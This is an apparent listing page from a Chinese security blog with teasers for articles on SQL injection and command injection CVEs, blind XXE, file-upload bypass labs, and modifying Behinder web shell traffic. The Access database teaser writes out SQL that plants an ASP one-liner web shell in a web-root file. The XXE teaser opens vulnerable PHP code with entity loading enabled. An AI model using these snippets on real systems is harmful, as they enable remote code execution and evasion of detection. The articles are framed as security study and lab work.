欢迎关注公众号《TEST安全》,定时更新安全相关内容
WEB安全
  • Windows环境中Domain Controller (域控制器)的搭建,零基础教学详细教程

    1.搭建域环境 什么是域? Windows域为网络管理员提供了一种方法来管理大量的pc机,并从一个地方控制它们。一个或多个服务器(称为域控制器)控制域及其上的计算机。 域通常由在同一本地网络上的计算机组成。但是,连……

    漏洞空间 2024-08-08
    0 0
  • 统信安装wine9.1支持exe64位运行环境

    安装命令如下: git clone https://gitee.com/winehq/wine.git git checkout wine-9.1   安装依赖 sudo apt install libwayland-dev sudo apt install libpcsclite-dev sudo apt install libsane-dev sudo……

    漏洞空间 2024-05-31
    0 1
  • sqlmap在匿名管道中报using ‘STDIN’ for parsing targets list

    如图所示:  解决:通过跟踪断点信息,发现有个config的参数conf.stdinPipe的值和直接在shell中执行命令行的值不一致,所以在sqlmap的源码的lib/core/option.py 中的init()方法中设置conf.stdinPipe=None后解决了……

    漏洞空间 2024-04-28
    0 0
  • CVE-2020-19961(zzcms存在sql注入漏洞)

    zz cms 2019 subzs.php 存在sql注入漏洞 文件对应路径:  zs/subzs.php 注入漏洞存在位置: 在showcookiezs函数中,第十六行sql语句将cookie中接收的zzcmscpid没闭合直接拼接 查找调用showcookiezs的函数,在fix函……

    漏洞空间 2024-01-23
    0 0
  • access数据库导出数据表内容到根目录

    创建表a1字段b create table a1(b text) 像表a1字段b里面写入数据 insert into a1 (b) values('<%execute request(1)%>') 把写入的数据导出到D:\web\11.asp SELECT b into [<%execute request(1)%>] i……

    漏洞空间 2023-11-24
    0 0
  • 冰蝎4.0流量分析及魔改

    冰蝎4.0流量分析及魔改 0x00 前言 冰蝎v4.0开放了传输协议的自定义功能,使得流量魔改更为简单方便,本文以jsp脚本类型为例,提供一些冰蝎4流量魔改的方式 0x01传输协议分析 冰蝎4内置了如下几种传输协议,传输协……

    漏洞空间 2023-08-19
    0 0
  • XXE漏洞之解决读带特殊字符的文件无回显问题

    无回显读取本地敏感文件(Blind OOB XXE) xml.php(保存当根目录如127.0.0.1/xml.php) <?php libxml_disable_entity_loader (false); $xmlfile = file_get_contents('php://input'); $dom = new DOMDocume……

    漏洞空间 2023-05-31
    0 0
  • 泛微 E-Office 命令注入漏洞 CVE-2023-2647

    漏洞描述 泛微 E-Office 9.5版本中文件上传处理程序接口/webroot/inc/utility_all.php存在命令注入漏洞,攻击者可以通过远程控制接口输入恶意命令执行恶意操作。 漏洞级别 严重 影响范围 泛微 E-Office 9.5 漏洞修……

    漏洞空间 2023-05-13
    0 0
  • 【文件上传绕过】解析漏洞_.htaccess文件解析漏洞

    一、实验目的: 1、了解什么是.htaccess文件。 2、通过upload-labs闯关游戏(Pass-04),掌握.htaccess文件解析漏洞技术。 二、工具: cmd命令行 火狐/谷歌浏览器 三、实验环境: 靶 机: windows10虚拟机:192.168……

    漏洞空间 2023-05-13
    0 0
  • 【文件上传绕过】–二次渲染漏洞

    一、实验目的: 1、通过实验学习二次渲染原理的成因。 2、通过搭建漏洞环境,学习绕过技巧。 二、漏洞说明: 1. 二次渲染原理: 1、配合文件包含漏洞:   将一句话木马插入到网站二次处理后的图片中,也就是……

    漏洞空间 2023-05-13
    0 0